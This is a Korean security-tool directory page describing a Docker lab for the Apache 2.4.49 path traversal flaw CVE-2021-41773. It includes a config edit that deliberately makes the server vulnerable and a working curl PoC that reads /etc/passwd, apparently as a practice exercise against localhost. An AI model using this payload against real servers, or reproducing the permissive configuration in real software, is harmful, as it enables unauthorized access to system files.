Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2021-41773 — Docker 기반의 실습 환경으로, CVE-2021-41773 Apache 경로 탐색 취약점에 대한 PoC 익스플로잇 및 보안 테스트와 교육을 위한 상세 가이드를 제공합니다. | Kitploit
도구/GitHubGitHub/jiyun02/cve-2021-41773
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingLearning & EducationLabs & Practice
GitHubjiyun02/cve-2021-41773

cve-2021-41773

Docker 기반의 실습 환경으로, CVE-2021-41773 Apache 경로 탐색 취약점에 대한 PoC 익스플로잇 및 보안 테스트와 교육을 위한 상세 가이드를 제공합니다.

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-41773 – Apache Path Traversal 보고서


요약

  • Apache HTTP Server 2.4.49 버전에서 발견된 취약점으로, 웹 서버 설정에 따라 Path Traversal 공격을 통해 시스템의 민감한 파일을 노출할 수 있음
  • Path Traversal: 공격자가 ../ 을 포함한 경로를 사용하여 웹 루트 밖의 파일에 접근할 수 있음

정보

  • 취약점 이름: CVE-2021-41773
  • 영향받는 버전: Apache HTTP Server 2.4.49
  • 취약점 유형: Path Traversal
  • 공식 패치 여부: 2.4.50 이상에서 패치됨

실습 환경 구성

  • Base Image : 'httpd:2.4.49' (DockerHub)
  • 컨테이너 구동 방식 : Dockerfile + docker-compose.yml
  • 실행 포트 : 8080 → 컨테이너의 80포트로 연결
  • Apache 설정 변경 : 'Require all granted'로 수정 (Path Traversal 가능하게 함)

환경 실행 방법

  • git clone https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

취약점 PoC

  • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

상세 과정

  1. 과제를 위한 디렉터리 실행 image
image
  1. Dockerfile 제작 image

-> Base Image: httpd:2.4.49 (취약점이 존재하는 버전)

-> 'sed -i 's/Require all denied/Require all granted/g' : Path Traversal 허용 및 외부 접근

  1. docker-compose.yml image

-> Apache 정의

-> 8080 포트를 컨테이너의 80 포트로 매핑

  1. docker 실행

    image
  2. PoC 실행

    image

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd는 민감한 정보를 담고 있음, %2e는 ..의 인코딩된 단어이며 이는 상위 디렉터리로 이동하는 명령

-> 경로를 조작하여 서버가 /etc/passwd에 접근하고 이를 출력하도록 함

  1. 실행 결과 image

-> 상기 이미지와 같이 민감한 디렉터리에 접근 가능


Fork를 통해 접근 가능한 레포지토리 URL

https://github.com/JIYUN02/cve-2021-41773

-> 커밋 이력 존재

도구 다운로드